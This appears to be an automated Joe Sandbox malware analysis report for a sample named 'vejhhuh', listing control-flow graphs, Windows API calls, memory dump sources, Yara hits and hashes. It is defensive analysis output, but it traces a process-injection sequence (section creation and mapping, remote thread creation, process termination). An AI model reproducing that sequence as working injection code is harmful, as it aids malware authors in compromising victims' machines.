                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00419FF1
                                                                                                                              • GetLongPathNameA.KERNEL32(0041C418,?,00000000), ref: 0041A004
                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 0041A00C
                                                                                                                              • LoadLibraryA.KERNELBASE(0041C424), ref: 0041A092
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Console$File$CommName$CopyLengthObject$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCreateDefaultEnvironmentExchangeExesFindFocusFormatInformationInterlockedLibraryLoadLongMessageModeModuleOutputPathPipePrivilegeReadSingleStateStringsSystemTimeTimeoutsTypeVolumeWaitWrite
                                                                                                                              • String ID: k`$}$
                                                                                                                              • API String ID: 4249349521-956986773
                                                                                                                              • Opcode ID: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
                                                                                                                              • Instruction ID: 1ffa0da19b14ee91b85dcd2083993de682bc4a00c742463c13e7108b831189b5
                                                                                                                              • Opcode Fuzzy Hash: 8a0022938582e7786455545f2d2a0aa76fb25a487d10df4c359a7132c8526bce
                                                                                                                              • Instruction Fuzzy Hash: AAA19071802524ABD724DB61DC58FDF7B68EF5D311F00816AF609A2161DB381A85CFED

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 148 4014c4-4014f6 154 4014f9-40150d call 401240 148->154 159 401512-401513 154->159 160 401544-401545 159->160 161 401515-401528 159->161 163 401547 160->163 164 4015bd-4015d4 160->164 161->154 162 40152a-401535 161->162 162->159 165 401537-401543 162->165 166 401596-4015a6 163->166 167 401549-40154b 163->167 165->160 169 4015a8 166->169 167->169 170 40154d-40156d 167->170 172 4015e7-40160a call 401240 170->172 173 40156f 170->173 182 40160c 172->182 183 40160f-401614 172->183 176 401571 173->176 177 4015e2-4015e3 173->177 177->172 182->183 185 40161a-40162b 183->185 186 40193e-401946 183->186 190 401631-40165a 185->190 191 40193c 185->191 186->183 189 40194b-40198e call 401240 186->189 190->191 198 401660-401677 NtDuplicateObject 190->198 191->189 198->191 200 40167d-4016a1 NtCreateSection 198->200 202 4016a3-4016c4 NtMapViewOfSection 200->202 203 4016fd-401723 NtCreateSection 200->203 202->203 206 4016c6-4016e2 NtMapViewOfSection 202->206 203->191 207 401729-40172d 203->207 206->203 208 4016e4-4016fa 206->208 207->191 209 401733-401754 NtMapViewOfSection 207->209 208->203 209->191 212 40175a-401776 NtMapViewOfSection 209->212 212->191 215 40177c 212->215 215->191 216 40177c call 401781 215->216 216->191
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
                                                                                                                              • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                              • Opcode Fuzzy Hash: c7f1aecd654c101580c33caa0697f0a4eb1be03b42db6f7e8c2cb2cd626b67d0
                                                                                                                              • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 217 4015d5-4015e4 219 4015f4 217->219 220 4015eb-4015f0 217->220 219->220 221 4015f7-40160a call 401240 219->221 220->221 224 40160c 221->224 225 40160f-401614 221->225 224->225 227 40161a-40162b 225->227 228 40193e-401946 225->228 232 401631-40165a 227->232 233 40193c 227->233 228->225 231 40194b-40198e call 401240 228->231 232->233 240 401660-401677 NtDuplicateObject 232->240 233->231 240->233 242 40167d-4016a1 NtCreateSection 240->242 244 4016a3-4016c4 NtMapViewOfSection 242->244 245 4016fd-401723 NtCreateSection 242->245 244->245 248 4016c6-4016e2 NtMapViewOfSection 244->248 245->233 249 401729-40172d 245->249 248->245 250 4016e4-4016fa 248->250 249->233 251 401733-401754 NtMapViewOfSection 249->251 250->245 251->233 254 40175a-401776 NtMapViewOfSection 251->254 254->233 257 40177c 254->257 257->233 258 40177c call 401781 257->258 258->233
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
                                                                                                                              • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                              • Opcode Fuzzy Hash: 00fdf6c0c0cec7800d010119070486e13fc8524dff54e87bd902aee4aa991197
                                                                                                                              • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 259 4015df-4015e4 261 4015f4 259->261 262 4015eb-4015f0 259->262 261->262 263 4015f7-40160a call 401240 261->263 262->263 266 40160c 263->266 267 40160f-401614 263->267 266->267 269 40161a-40162b 267->269 270 40193e-401946 267->270 274 401631-40165a 269->274 275 40193c 269->275 270->267 273 40194b-40198e call 401240 270->273 274->275 282 401660-401677 NtDuplicateObject 274->282 275->273 282->275 284 40167d-4016a1 NtCreateSection 282->284 286 4016a3-4016c4 NtMapViewOfSection 284->286 287 4016fd-401723 NtCreateSection 284->287 286->287 290 4016c6-4016e2 NtMapViewOfSection 286->290 287->275 291 401729-40172d 287->291 290->287 292 4016e4-4016fa 290->292 291->275 293 401733-401754 NtMapViewOfSection 291->293 292->287 293->275 296 40175a-401776 NtMapViewOfSection 293->296 296->275 299 40177c 296->299 299->275 300 40177c call 401781 299->300 300->275
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
                                                                                                                              • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                              • Opcode Fuzzy Hash: 7737ff869299ca3ca4dc99499382bd8f34633e79eedf9272cde4017979e02a10
                                                                                                                              • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 301 4015f2-4015f4 303 4015f7-40160a call 401240 301->303 304 4015eb-4015f0 301->304 307 40160c 303->307 308 40160f-401614 303->308 304->303 307->308 310 40161a-40162b 308->310 311 40193e-401946 308->311 315 401631-40165a 310->315 316 40193c 310->316 311->308 314 40194b-40198e call 401240 311->314 315->316 323 401660-401677 NtDuplicateObject 315->323 316->314 323->316 325 40167d-4016a1 NtCreateSection 323->325 327 4016a3-4016c4 NtMapViewOfSection 325->327 328 4016fd-401723 NtCreateSection 325->328 327->328 331 4016c6-4016e2 NtMapViewOfSection 327->331 328->316 332 401729-40172d 328->332 331->328 333 4016e4-4016fa 331->333 332->316 334 401733-401754 NtMapViewOfSection 332->334 333->328 334->316 337 40175a-401776 NtMapViewOfSection 334->337 337->316 340 40177c 337->340 340->316 341 40177c call 401781 340->341 341->316
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
                                                                                                                              • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                              • Opcode Fuzzy Hash: d18b6c02a51361cd05e07a842d3e0aa79c0e363c2c3393af6b77ca0a2f8cc2c4
                                                                                                                              • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 342 4015e6-40160a call 401240 347 40160c 342->347 348 40160f-401614 342->348 347->348 350 40161a-40162b 348->350 351 40193e-401946 348->351 355 401631-40165a 350->355 356 40193c 350->356 351->348 354 40194b-40198e call 401240 351->354 355->356 363 401660-401677 NtDuplicateObject 355->363 356->354 363->356 365 40167d-4016a1 NtCreateSection 363->365 367 4016a3-4016c4 NtMapViewOfSection 365->367 368 4016fd-401723 NtCreateSection 365->368 367->368 371 4016c6-4016e2 NtMapViewOfSection 367->371 368->356 372 401729-40172d 368->372 371->368 373 4016e4-4016fa 371->373 372->356 374 401733-401754 NtMapViewOfSection 372->374 373->368 374->356 377 40175a-401776 NtMapViewOfSection 374->377 377->356 380 40177c 377->380 380->356 381 40177c call 401781 380->381 381->356
                                                                                                                              APIs
                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1546783058-0
                                                                                                                              • Opcode ID: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
                                                                                                                              • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                              • Opcode Fuzzy Hash: 17d0a7aae4e5eab7518e2aba78030d0a90555c236ae4342c3ab8b69e33cd9608
                                                                                                                              • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 383 403043-403067 384 40319a-40319f 383->384 385 40306d-403085 383->385 385->384 386 40308b-40309c 385->386 387 40309e-4030a7 386->387 388 4030ac-4030ba 387->388 388->388 389 4030bc-4030c3 388->389 390 4030e5-4030ec 389->390 391 4030c5-4030e4 389->391 392 40310e-403111 390->392 393 4030ee-40310d 390->393 391->390 394 403113-403116 392->394 395 40311a 392->395 393->392 394->395 396 403118 394->396 395->387 397 40311c-403121 395->397 396->397 397->384 398 403123-403126 397->398 398->384 399 403128-403197 RtlCreateUserThread NtTerminateProcess 398->399 399->384
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1921587553-0
                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                              • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 63 67003c-670047 64 67004c-670263 call 670a3f call 670e0f call 670d90 VirtualAlloc 63->64 65 670049 63->65 80 670265-670289 call 670a69 64->80 81 67028b-670292 64->81 65->64 85 6702ce-6703c2 VirtualProtect call 670cce call 670ce7 80->85 83 6702a1-6702b0 81->83 84 6702b2-6702cc 83->84 83->85 84->83 92 6703d1-6703e0 85->92 93 6703e2-670437 call 670ce7 92->93 94 670439-6704b8 VirtualFree 92->94 93->92 96 6705f4-6705fe 94->96 97 6704be-6704cd 94->97 98 670604-67060d 96->98 99 67077f-670789 96->99 101 6704d3-6704dd 97->101 98->99 104 670613-670637 98->104 102 6707a6-6707b0 99->102 103 67078b-6707a3 99->103 101->96 106 6704e3-670505 101->106 107 6707b6-6707cb 102->107 108 67086e-6708be LoadLibraryA 102->108 103->102 109 67063e-670648 104->109 114 670517-670520 106->114 115 670507-670515 106->115 111 6707d2-6707d5 107->111 113 6708c7-6708f9 108->113 109->99 112 67064e-67065a 109->112 116 6707d7-6707e0 111->116 117 670824-670833 111->117 112->99 118 670660-67066a 112->118 119 670902-67091d 113->119 120 6708fb-670901 113->120 121 670526-670547 114->121 115->121 122 6707e4-670822 116->122 123 6707e2 116->123 125 670839-67083c 117->125 124 67067a-670689 118->124 120->119 126 67054d-670550 121->126 122->111 123->117 127 670750-67077a 124->127 128 67068f-6706b2 124->128 125->108 129 67083e-670847 125->129 131 670556-67056b 126->131 132 6705e0-6705ef 126->132 127->109 133 6706b4-6706ed 128->133 134 6706ef-6706fc 128->134 135 67084b-67086c 129->135 136 670849 129->136 137 67056f-67057a 131->137 138 67056d 131->138 132->101 133->134 139 6706fe-670748 134->139 140 67074b 134->140 135->125 136->108 141 67057c-670599 137->141 142 67059b-6705bb 137->142 138->132 139->140 140->124 147 6705bd-6705db 141->147 142->147 147->126
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0067024D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_670000_vejhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID: cess$kernel32.dll
                                                                                                                              • API String ID: 4275171209-1230238691
                                                                                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction ID: 3765450f4516cd5a446ec64091ac8bb535a0f3870ef1ebb4caee572cfbf4afc2
                                                                                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                              • Instruction Fuzzy Hash: 69526A74A01229DFEB64CF58C985BA8BBB1BF09304F1480D9E54DAB351DB30AE95DF24

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 382 419a70-419bb0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00515FF0), ref: 00419B4F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,00420518), ref: 00419B8C
                                                                                                                              • VirtualProtect.KERNELBASE(00515E34,00515FEC,00000040,?), ref: 00419BAB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561224243.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_40b000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2099061454-3916222277
                                                                                                                              • Opcode ID: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction ID: 9b101dc19ab9e509907a73f40bd9e615ad2773d8f65bdac5e4741cefec9585ad
                                                                                                                              • Opcode Fuzzy Hash: 491ec6e3e3ee18dcc8e26f8905b2a401390c51c225c0d3e182c0eb7754f552da
                                                                                                                              • Instruction Fuzzy Hash: 273164516187C4EAE311CB64FC087523AA2AF79704F448069A148877B3E7BE065ADB6E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 400 76083f-760858 401 76085a-76085c 400->401 402 760863-76086f CreateToolhelp32Snapshot 401->402 403 76085e 401->403 404 760871-760877 402->404 405 76087f-76088c Module32First 402->405 403->402 404->405 410 760879-76087d 404->410 406 760895-76089d 405->406 407 76088e-76088f call 7604fe 405->407 411 760894 407->411 410->401 410->405 411->406
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00760867
                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 00760887
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_75d000_vejhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3833638111-0
                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction ID: b37553699337ad379a08845bc96b5f6d2e2723cf41909b141697a890a3333982
                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                              • Instruction Fuzzy Hash: 02F09636100711AFD7207BFAA88DB6F76E8AF59725F140528EA47934C0DB74EC4546E1

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 413 670e0f-670e24 SetErrorMode * 2 414 670e26 413->414 415 670e2b-670e2c 413->415 414->415
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00000400,?,?,00670223,?,?), ref: 00670E19
                                                                                                                              • SetErrorMode.KERNELBASE(00000000,?,?,00670223,?,?), ref: 00670E1E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_670000_vejhhuh.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction ID: 5a5a572b8c797ad976ea18bf62a4cab0582b95af9600aa588e6fb0acf5fca8fa
                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                              • Instruction Fuzzy Hash: 6FD01231145128B7D7002A94DC09BCD7B1CDF09B62F008411FB0DD9180C770994046E5

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 416 401991-4019ed call 401240 Sleep 428 4019f3-4019f5 416->428 429 4019ee call 4014c4 416->429 430 401a04-401a52 call 401240 428->430 431 4019f7-4019ff call 4015b7 428->431 429->428 431->430
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                              • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                              • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                              • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 445 4019a9-4019ed call 401240 Sleep 457 4019f3-4019f5 445->457 458 4019ee call 4014c4 445->458 459 401a04-401a52 call 401240 457->459 460 4019f7-4019ff call 4015b7 457->460 458->457 460->459
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                              • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                              • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                              • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 474 4019af-4019ed call 401240 Sleep 481 4019f3-4019f5 474->481 482 4019ee call 4014c4 474->482 483 401a04-401a52 call 401240 481->483 484 4019f7-4019ff call 4015b7 481->484 482->481 484->483
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                              • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                              • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                              • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 498 4019b8-4019ed call 401240 Sleep 502 4019f3-4019f5 498->502 503 4019ee call 4014c4 498->503 504 401a04-401a52 call 401240 502->504 505 4019f7-4019ff call 4015b7 502->505 503->502 505->504
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2561188949.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_vejhhuh.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
